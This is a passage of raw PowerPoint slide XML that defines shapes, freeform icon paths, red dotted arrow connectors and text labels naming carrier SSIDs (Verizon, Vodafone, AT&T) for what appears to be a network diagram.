            <a:xfrm>
              <a:off x="4880124" y="4292207"/>
              <a:ext cx="883575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SSID Verizon </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="894" name="Rectangle 893"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5960788" y="4292207"/>
              <a:ext cx="995785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SSID Vodafone </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="897" name="Rectangle 896"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9723568" y="4292207"/>
              <a:ext cx="744114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SSID AT&amp;T</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="898" name="Straight Arrow Connector 897"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="303" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2008797" y="2690792"/>
              <a:ext cx="3079555" cy="1933251"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/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9" name="Straight Arrow Connector 898"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="323" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4365380" y="1994961"/>
              <a:ext cx="3112825" cy="2629082"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/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00" name="Group 828"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="6018007" y="1421948"/>
              <a:ext cx="481013" cy="388938"/>
              <a:chOff x="2154" y="1819"/>
              <a:chExt cx="217" cy="176"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="901" name="Group 829"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2154" y="1862"/>
                <a:ext cx="217" cy="133"/>
                <a:chOff x="1977" y="2705"/>
                <a:chExt cx="897" cy="548"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="917" name="Freeform 830"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1977" y="2787"/>
                  <a:ext cx="45" cy="321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3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3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18" name="Freeform 831"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2022" y="2787"/>
                  <a:ext cx="46" cy="321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3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3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Freeform 832"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2574" y="2932"/>
                  <a:ext cx="45" cy="321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20" name="Freeform 833"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2529" y="2932"/>
                  <a:ext cx="45" cy="321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21" name="Freeform 834"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2829" y="2866"/>
                  <a:ext cx="45" cy="321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22" name="Freeform 835"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2780" y="2866"/>
                  <a:ext cx="49" cy="321"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 13 w 13"/>
                    <a:gd name="T1" fmla="*/ 87 h 87"/>
                    <a:gd name="T2" fmla="*/ 0 w 13"/>
                    <a:gd name="T3" fmla="*/ 84 h 87"/>
                    <a:gd name="T4" fmla="*/ 0 w 13"/>
                    <a:gd name="T5" fmla="*/ 0 h 87"/>
                    <a:gd name="T6" fmla="*/ 13 w 13"/>
                    <a:gd name="T7" fmla="*/ 4 h 87"/>
                    <a:gd name="T8" fmla="*/ 13 w 13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87">
                      <a:moveTo>
                        <a:pt x="13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3" y="4"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13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23" name="Freeform 836"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2277" y="2705"/>
                  <a:ext cx="45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24" name="Freeform 837"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2277" y="2717"/>
                  <a:ext cx="45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25" name="Freeform 838"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2235" y="2717"/>
                  <a:ext cx="42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4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26" name="Freeform 839"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1977" y="2787"/>
                  <a:ext cx="597" cy="206"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 161 w 161"/>
                    <a:gd name="T1" fmla="*/ 43 h 56"/>
                    <a:gd name="T2" fmla="*/ 161 w 161"/>
                    <a:gd name="T3" fmla="*/ 56 h 56"/>
                    <a:gd name="T4" fmla="*/ 0 w 161"/>
                    <a:gd name="T5" fmla="*/ 12 h 56"/>
                    <a:gd name="T6" fmla="*/ 0 w 161"/>
                    <a:gd name="T7" fmla="*/ 0 h 56"/>
                    <a:gd name="T8" fmla="*/ 161 w 161"/>
                    <a:gd name="T9" fmla="*/ 43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1" h="56">
                      <a:moveTo>
                        <a:pt x="161" y="43"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="161" y="56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61" y="43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Freeform 840"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2574" y="2866"/>
                  <a:ext cx="300" cy="127"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 81 w 81"/>
                    <a:gd name="T1" fmla="*/ 0 h 35"/>
                    <a:gd name="T2" fmla="*/ 81 w 81"/>
                    <a:gd name="T3" fmla="*/ 13 h 35"/>
                    <a:gd name="T4" fmla="*/ 0 w 81"/>
                    <a:gd name="T5" fmla="*/ 35 h 35"/>
                    <a:gd name="T6" fmla="*/ 0 w 81"/>
                    <a:gd name="T7" fmla="*/ 22 h 35"/>
                    <a:gd name="T8" fmla="*/ 81 w 8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35">
                      <a:moveTo>
                        <a:pt x="81" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="81" y="13"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="35"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="22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Freeform 841"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1977" y="2705"/>
                  <a:ext cx="897" cy="240"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 242 w 242"/>
                    <a:gd name="T1" fmla="*/ 43 h 65"/>
                    <a:gd name="T2" fmla="*/ 161 w 242"/>
                    <a:gd name="T3" fmla="*/ 22 h 65"/>
                    <a:gd name="T4" fmla="*/ 161 w 242"/>
                    <a:gd name="T5" fmla="*/ 22 h 65"/>
                    <a:gd name="T6" fmla="*/ 81 w 242"/>
                    <a:gd name="T7" fmla="*/ 0 h 65"/>
                    <a:gd name="T8" fmla="*/ 0 w 242"/>
                    <a:gd name="T9" fmla="*/ 22 h 65"/>
                    <a:gd name="T10" fmla="*/ 81 w 242"/>
                    <a:gd name="T11" fmla="*/ 44 h 65"/>
                    <a:gd name="T12" fmla="*/ 81 w 242"/>
                    <a:gd name="T13" fmla="*/ 44 h 65"/>
                    <a:gd name="T14" fmla="*/ 161 w 242"/>
                    <a:gd name="T15" fmla="*/ 65 h 65"/>
                    <a:gd name="T16" fmla="*/ 242 w 242"/>
                    <a:gd name="T17" fmla="*/ 43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2" h="65">
                      <a:moveTo>
                        <a:pt x="242" y="43"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="161" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="161" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="81" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="81" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="81" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="161" y="65"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="242" y="43"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="8E47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02" name="Group 842"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2216" y="1833"/>
                <a:ext cx="90" cy="70"/>
                <a:chOff x="2155" y="1811"/>
                <a:chExt cx="675" cy="523"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="909" name="Freeform 843"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2490" y="1818"/>
                  <a:ext cx="314" cy="433"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 4460"/>
                    <a:gd name="T1" fmla="*/ 0 h 6160"/>
                    <a:gd name="T2" fmla="*/ 0 w 4460"/>
                    <a:gd name="T3" fmla="*/ 4972 h 6160"/>
                    <a:gd name="T4" fmla="*/ 4460 w 4460"/>
                    <a:gd name="T5" fmla="*/ 6160 h 6160"/>
                    <a:gd name="T6" fmla="*/ 4460 w 4460"/>
                    <a:gd name="T7" fmla="*/ 1188 h 6160"/>
                    <a:gd name="T8" fmla="*/ 0 w 4460"/>
                    <a:gd name="T9" fmla="*/ 0 h 6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60" h="6160">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="4972"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4460" y="6160"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4460" y="11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10" name="Freeform 844"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2513" y="1850"/>
                  <a:ext cx="268" cy="332"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 3803"/>
                    <a:gd name="T1" fmla="*/ 0 h 4725"/>
                    <a:gd name="T2" fmla="*/ 0 w 3803"/>
                    <a:gd name="T3" fmla="*/ 3711 h 4725"/>
                    <a:gd name="T4" fmla="*/ 3803 w 3803"/>
                    <a:gd name="T5" fmla="*/ 4725 h 4725"/>
                    <a:gd name="T6" fmla="*/ 3803 w 3803"/>
                    <a:gd name="T7" fmla="*/ 1014 h 4725"/>
                    <a:gd name="T8" fmla="*/ 0 w 3803"/>
                    <a:gd name="T9" fmla="*/ 0 h 47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03" h="4725">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="3711"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3803" y="4725"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3803" y="10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11" name="Freeform 845"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2490" y="1811"/>
                  <a:ext cx="340" cy="90"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 4831 w 4831"/>
                    <a:gd name="T1" fmla="*/ 1189 h 1288"/>
                    <a:gd name="T2" fmla="*/ 4460 w 4831"/>
                    <a:gd name="T3" fmla="*/ 1288 h 1288"/>
                    <a:gd name="T4" fmla="*/ 0 w 4831"/>
                    <a:gd name="T5" fmla="*/ 100 h 1288"/>
                    <a:gd name="T6" fmla="*/ 368 w 4831"/>
                    <a:gd name="T7" fmla="*/ 0 h 1288"/>
                    <a:gd name="T8" fmla="*/ 4831 w 4831"/>
                    <a:gd name="T9" fmla="*/ 1189 h 1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31" h="1288">
                      <a:moveTo>
                        <a:pt x="4831" y="1189"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4460" y="1288"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="100"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="368" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4831" y="1189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6350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="B2B2B2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12" name="Freeform 846"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2155" y="2127"/>
                  <a:ext cx="675" cy="181"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 9603"/>
                    <a:gd name="T1" fmla="*/ 1287 h 2577"/>
                    <a:gd name="T2" fmla="*/ 4802 w 9603"/>
                    <a:gd name="T3" fmla="*/ 0 h 2577"/>
                    <a:gd name="T4" fmla="*/ 9603 w 9603"/>
                    <a:gd name="T5" fmla="*/ 1287 h 2577"/>
                    <a:gd name="T6" fmla="*/ 4802 w 9603"/>
                    <a:gd name="T7" fmla="*/ 2577 h 2577"/>
                    <a:gd name="T8" fmla="*/ 0 w 9603"/>
                    <a:gd name="T9" fmla="*/ 1287 h 25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603" h="2577">
                      <a:moveTo>
                        <a:pt x="0" y="1287"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4802" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9603" y="1287"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4802" y="2577"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1287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13" name="Freeform 847"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2493" y="2218"/>
                  <a:ext cx="337" cy="116"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 4801"/>
                    <a:gd name="T1" fmla="*/ 1290 h 1656"/>
                    <a:gd name="T2" fmla="*/ 0 w 4801"/>
                    <a:gd name="T3" fmla="*/ 1656 h 1656"/>
                    <a:gd name="T4" fmla="*/ 4801 w 4801"/>
                    <a:gd name="T5" fmla="*/ 369 h 1656"/>
                    <a:gd name="T6" fmla="*/ 4801 w 4801"/>
                    <a:gd name="T7" fmla="*/ 0 h 1656"/>
                    <a:gd name="T8" fmla="*/ 0 w 4801"/>
                    <a:gd name="T9" fmla="*/ 1290 h 16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01" h="1656">
                      <a:moveTo>
                        <a:pt x="0" y="1290"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="1656"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4801" y="369"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4801" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="129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14" name="Freeform 848"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2155" y="2218"/>
                  <a:ext cx="338" cy="116"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 4802 w 4802"/>
                    <a:gd name="T1" fmla="*/ 1656 h 1656"/>
                    <a:gd name="T2" fmla="*/ 0 w 4802"/>
                    <a:gd name="T3" fmla="*/ 369 h 1656"/>
                    <a:gd name="T4" fmla="*/ 0 w 4802"/>
                    <a:gd name="T5" fmla="*/ 0 h 1656"/>
                    <a:gd name="T6" fmla="*/ 4802 w 4802"/>
                    <a:gd name="T7" fmla="*/ 1290 h 1656"/>
                    <a:gd name="T8" fmla="*/ 4802 w 4802"/>
                    <a:gd name="T9" fmla="*/ 1656 h 16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02" h="1656">
                      <a:moveTo>
                        <a:pt x="4802" y="1656"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="369"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4802" y="1290"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4802" y="165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6350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="B2B2B2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15" name="Freeform 849"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2251" y="2157"/>
                  <a:ext cx="457" cy="122"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 6492"/>
                    <a:gd name="T1" fmla="*/ 654 h 1743"/>
                    <a:gd name="T2" fmla="*/ 4061 w 6492"/>
                    <a:gd name="T3" fmla="*/ 1743 h 1743"/>
                    <a:gd name="T4" fmla="*/ 6492 w 6492"/>
                    <a:gd name="T5" fmla="*/ 1091 h 1743"/>
                    <a:gd name="T6" fmla="*/ 2431 w 6492"/>
                    <a:gd name="T7" fmla="*/ 0 h 1743"/>
                    <a:gd name="T8" fmla="*/ 0 w 6492"/>
                    <a:gd name="T9" fmla="*/ 654 h 1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92" h="1743">
                      <a:moveTo>
                        <a:pt x="0" y="654"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4061" y="1743"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6492" y="1091"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2431" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="654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16" name="Freeform 850"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2804" y="1894"/>
                  <a:ext cx="26" cy="357"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 371"/>
                    <a:gd name="T1" fmla="*/ 5071 h 5071"/>
                    <a:gd name="T2" fmla="*/ 371 w 371"/>
                    <a:gd name="T3" fmla="*/ 4972 h 5071"/>
                    <a:gd name="T4" fmla="*/ 371 w 371"/>
                    <a:gd name="T5" fmla="*/ 0 h 5071"/>
                    <a:gd name="T6" fmla="*/ 0 w 371"/>
                    <a:gd name="T7" fmla="*/ 99 h 5071"/>
                    <a:gd name="T8" fmla="*/ 0 w 371"/>
                    <a:gd name="T9" fmla="*/ 5071 h 50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1" h="5071">
                      <a:moveTo>
                        <a:pt x="0" y="5071"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="371" y="4972"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="371" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="99"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="5071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03" name="Group 851"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2160" y="1819"/>
                <a:ext cx="110" cy="171"/>
                <a:chOff x="2158" y="1204"/>
                <a:chExt cx="419" cy="647"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="904" name="Freeform 852"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2294" y="1592"/>
                  <a:ext cx="177" cy="231"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 108 w 108"/>
                    <a:gd name="T1" fmla="*/ 36 h 140"/>
                    <a:gd name="T2" fmla="*/ 108 w 108"/>
                    <a:gd name="T3" fmla="*/ 35 h 140"/>
                    <a:gd name="T4" fmla="*/ 108 w 108"/>
                    <a:gd name="T5" fmla="*/ 28 h 140"/>
                    <a:gd name="T6" fmla="*/ 108 w 108"/>
                    <a:gd name="T7" fmla="*/ 23 h 140"/>
                    <a:gd name="T8" fmla="*/ 108 w 108"/>
                    <a:gd name="T9" fmla="*/ 22 h 140"/>
                    <a:gd name="T10" fmla="*/ 108 w 108"/>
                    <a:gd name="T11" fmla="*/ 17 h 140"/>
                    <a:gd name="T12" fmla="*/ 108 w 108"/>
                    <a:gd name="T13" fmla="*/ 16 h 140"/>
                    <a:gd name="T14" fmla="*/ 108 w 108"/>
                    <a:gd name="T15" fmla="*/ 16 h 140"/>
                    <a:gd name="T16" fmla="*/ 89 w 108"/>
                    <a:gd name="T17" fmla="*/ 7 h 140"/>
                    <a:gd name="T18" fmla="*/ 64 w 108"/>
                    <a:gd name="T19" fmla="*/ 2 h 140"/>
                    <a:gd name="T20" fmla="*/ 57 w 108"/>
                    <a:gd name="T21" fmla="*/ 4 h 140"/>
                    <a:gd name="T22" fmla="*/ 49 w 108"/>
                    <a:gd name="T23" fmla="*/ 6 h 140"/>
                    <a:gd name="T24" fmla="*/ 49 w 108"/>
                    <a:gd name="T25" fmla="*/ 6 h 140"/>
                    <a:gd name="T26" fmla="*/ 0 w 108"/>
                    <a:gd name="T27" fmla="*/ 18 h 140"/>
                    <a:gd name="T28" fmla="*/ 29 w 108"/>
                    <a:gd name="T29" fmla="*/ 47 h 140"/>
                    <a:gd name="T30" fmla="*/ 62 w 108"/>
                    <a:gd name="T31" fmla="*/ 40 h 140"/>
                    <a:gd name="T32" fmla="*/ 62 w 108"/>
                    <a:gd name="T33" fmla="*/ 118 h 140"/>
                    <a:gd name="T34" fmla="*/ 101 w 108"/>
                    <a:gd name="T35" fmla="*/ 129 h 140"/>
                    <a:gd name="T36" fmla="*/ 108 w 108"/>
                    <a:gd name="T37" fmla="*/ 117 h 140"/>
                    <a:gd name="T38" fmla="*/ 108 w 108"/>
                    <a:gd name="T39" fmla="*/ 36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08" h="140">
                      <a:moveTo>
                        <a:pt x="108" y="36"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="36"/>
                        <a:pt x="108" y="36"/>
                        <a:pt x="108" y="35"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="33"/>
                        <a:pt x="108" y="30"/>
                        <a:pt x="108" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="28"/>
                        <a:pt x="108" y="26"/>
                        <a:pt x="108" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="23"/>
                        <a:pt x="108" y="22"/>
                        <a:pt x="108" y="22"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="21"/>
                        <a:pt x="108" y="19"/>
                        <a:pt x="108" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="17"/>
                        <a:pt x="108" y="17"/>
                        <a:pt x="108" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="16"/>
                        <a:pt x="108" y="16"/>
                        <a:pt x="108" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="105" y="4"/>
                        <a:pt x="95" y="8"/>
                        <a:pt x="89" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="85" y="6"/>
                        <a:pt x="73" y="0"/>
                        <a:pt x="64" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="60" y="3"/>
                        <a:pt x="57" y="4"/>
                        <a:pt x="57" y="4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29" y="47"/>
                        <a:pt x="29" y="47"/>
                        <a:pt x="29" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="40"/>
                        <a:pt x="62" y="40"/>
                        <a:pt x="62" y="40"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="67"/>
                        <a:pt x="62" y="109"/>
                        <a:pt x="62" y="118"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="63" y="138"/>
                        <a:pt x="89" y="140"/>
                        <a:pt x="101" y="129"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="105" y="126"/>
                        <a:pt x="108" y="122"/>
                        <a:pt x="108" y="117"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="101"/>
                        <a:pt x="107" y="69"/>
                        <a:pt x="108" y="3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72549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05" name="Freeform 853"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2225" y="1575"/>
                  <a:ext cx="326" cy="276"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 196 w 197"/>
                    <a:gd name="T1" fmla="*/ 44 h 167"/>
                    <a:gd name="T2" fmla="*/ 196 w 197"/>
                    <a:gd name="T3" fmla="*/ 37 h 167"/>
                    <a:gd name="T4" fmla="*/ 177 w 197"/>
                    <a:gd name="T5" fmla="*/ 18 h 167"/>
                    <a:gd name="T6" fmla="*/ 137 w 197"/>
                    <a:gd name="T7" fmla="*/ 25 h 167"/>
                    <a:gd name="T8" fmla="*/ 99 w 197"/>
                    <a:gd name="T9" fmla="*/ 35 h 167"/>
                    <a:gd name="T10" fmla="*/ 99 w 197"/>
                    <a:gd name="T11" fmla="*/ 52 h 167"/>
                    <a:gd name="T12" fmla="*/ 99 w 197"/>
                    <a:gd name="T13" fmla="*/ 35 h 167"/>
                    <a:gd name="T14" fmla="*/ 99 w 197"/>
                    <a:gd name="T15" fmla="*/ 35 h 167"/>
                    <a:gd name="T16" fmla="*/ 99 w 197"/>
                    <a:gd name="T17" fmla="*/ 2 h 167"/>
                    <a:gd name="T18" fmla="*/ 89 w 197"/>
                    <a:gd name="T19" fmla="*/ 14 h 167"/>
                    <a:gd name="T20" fmla="*/ 2 w 197"/>
                    <a:gd name="T21" fmla="*/ 8 h 167"/>
                    <a:gd name="T22" fmla="*/ 2 w 197"/>
                    <a:gd name="T23" fmla="*/ 10 h 167"/>
                    <a:gd name="T24" fmla="*/ 2 w 197"/>
                    <a:gd name="T25" fmla="*/ 31 h 167"/>
                    <a:gd name="T26" fmla="*/ 12 w 197"/>
                    <a:gd name="T27" fmla="*/ 67 h 167"/>
